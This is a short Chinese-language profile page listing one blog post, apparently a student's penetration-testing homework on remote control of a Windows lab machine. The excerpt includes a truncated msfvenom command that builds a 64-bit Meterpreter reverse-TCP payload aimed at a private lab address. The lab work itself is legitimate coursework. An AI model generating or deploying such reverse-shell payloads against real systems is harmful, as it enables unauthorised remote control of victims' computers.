
简介
该用户还未填写简介
擅长的技术栈
未填写擅长的技术栈
可提供的服务
暂无可提供的服务
网络渗透测试作业6:网站配置和远程控制
但kali中的payload我移到电脑桌面后,在后续的实验中点击kali却无反应,后面查询AI说如果目标windows是64位,那么payload也应是64位,我运行payload后在任务管理器中发现它是32位,所以我采用另外一种命令:msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.139.132 lport=5000 -
到底了







